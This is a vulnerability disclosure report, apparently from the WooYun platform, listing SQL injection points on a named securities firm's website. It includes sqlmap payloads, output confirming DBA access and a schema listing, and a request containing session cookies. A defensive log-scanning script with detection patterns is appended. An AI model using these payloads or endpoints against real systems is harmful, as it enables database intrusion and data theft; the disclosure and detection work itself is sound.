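2015-06-02: Details reported to the vendor; awaiting vendor handling
2015-06-07: Vendor has actively ignored the vulnerability; details disclosed to the public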
233
Every time it's 9 rank and it gets handled as a small vendor. I really can't take it anymore. This time I've bundled everything together, hoping for the front page, hoping for 20 rank!

1. http://www.glsc.com.cn/glzq/mobileQuestion.do?method=listQuestionForPage&qType=tbAdvice*
2. http://www.glsc.com.cn/glzq/jyzx/info_content.jsp?id=486551567207*
3. http://www.glsc.com.cn/glzq/financing/management/new_y5.jsp?fundcode=B40325*
4. http://www.glsc.com.cn/glzq/f10Action.do?codes=*1dV&method=getJTBshow&pagesize=7
5. The following POST request:

    POST /glzq/f10Action.do?method=gsgk HTTP/1.1
    Content-Length: 147
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: http://www.glsc.com.cn
    Cookie: BIGipServerpool_guanwang=185655306.36895.0000; JSESSIONID=E7694F881AA86232A8EA45FDDFF84993; JSESSIONID=A20065C59B1BD74020792544C2612BD3; URID=3f04acbe-c18a-472b-972b-bcb754c5e99f
    Host: www.glsc.com.cn
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
    Accept: */*

    gpdm=*&searchgpdm=%e4%bb%a3%e7%a0%81/%e5%90%8d%e7%a7%b0/%e7%ae%80%e6%8b%bc&Submit3=%e6%9f%a5%e8%af%a2

6. http://www.glsc.com.cn/glzq/broker/salerQuery.jsp?dept=1&salername=*
7. http://www.glsc.com.cn/glzq/broker/brokerQuery.jsp?brokerName=*
8. http://www.glsc.com.cn/glzq/broker/advisorQuery.jsp?advisorName=*
9. http://www.glsc.com.cn/glzq/broker/advisorQuery.jsp?advisorName=dexsfqfy&dept=*
10. http://www.glsc.com.cn/glzq/newCms.do?method=getNewsPage&whichCat=gsdt (parameter: whichCat)
    ---
    Parameter: qType (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: method=listQuestionForPage&qType=tbAdvice' AND 3765=3765 AND 'AlEv'='AlEv

        Type: AND/OR time-based blind
        Title: Oracle AND time-based blind
        Payload: method=listQuestionForPage&qType=tbAdvice' AND 5883=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(108)||CHR(109)||CHR(109),5) AND 'llit'='llit
    ---
    [15:49:35] [INFO] the back-end DBMS is Oracle
    web application technology: JSP
    back-end DBMS: Oracle
    current user: 'GLZQ'
    current user is DBA: True
    available databases [16]:
    [*] CTXSYS
    [*] DBSNMP
    [*] DMSYS
    [*] EXFSYS
    [*] GLZQ
    [*] MDSYS
    [*] OLAPSYS
    [*] ORDSYS
    [*] OUTLN
    [*] SCOTT
    [*] SYS
    [*] SYSMAN
    [*] SYSTEM
    [*] TSMSYS
    [*] WMSYS
    [*] XD
Requesting 20 rank!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Severity: No impact, ignored by vendor
Ignored at: 2015-06-07 16:04
Vulnerability Rank: 15 (WooYun rating)
None yet
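
Added example, not part of the original report: a defender-side scan of web access logs for the two payload shapes in the sqlmap output above (the boolean `AND n=n` probe and the Oracle `DBMS_PIPE.RECEIVE_MESSAGE` delay with `CHR()` concatenation). The log lines, client address, rule names and the function name `scan_request_line` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Rules modelled on the two sqlmap payload types quoted in the report.
RULES = [
    # Oracle time-based blind: DBMS_PIPE.RECEIVE_MESSAGE(..., delay)
    ("oracle-time-delay", re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(", re.I)),
    # Boolean-based blind: quote break-out followed by AND/OR n=n
    ("boolean-tautology", re.compile(r"'\s*(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
    # String built from CHR(n)||CHR(n)||... to avoid quoted literals
    ("chr-concat", re.compile(r"(?:CHR\(\d+\)\s*\|\|\s*){2,}CHR\(\d+\)", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan_request_line(line):
    """Return sorted (parameter, rule) hits for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []  # not a request line we understand
    hits = set()
    # parse_qsl splits on & and = first, then percent-decodes each value
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.add((name, rule))
    return sorted(hits)

# Constructed sample log lines (192.0.2.10 is a documentation address).
PREFIX = '192.0.2.10 - - [02/Jun/2015:15:40:01 +0800] "GET /glzq/mobileQuestion.do?method=listQuestionForPage&qType='
SAMPLE_LOG = [
    PREFIX + 'tbAdvice HTTP/1.1" 200 5120',
    PREFIX + "tbAdvice%27%20AND%203765%3D3765%20AND%20%27AlEv%27%3D%27AlEv" + ' HTTP/1.1" 200 5120',
    PREFIX + "tbAdvice%27%20AND%205883%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(100)%7C%7CCHR(108)"
             "%7C%7CCHR(109)%7C%7CCHR(109)%2C5)%20AND%20%27llit%27%3D%27llit" + ' HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_request_line(entry))
```

Signature hits like these only show that probing occurred; the injection points themselves are closed by binding request parameters instead of concatenating them into SQL. POST bodies such as item 5 do not appear in an access log, so the same rules would have to run where the body is visible.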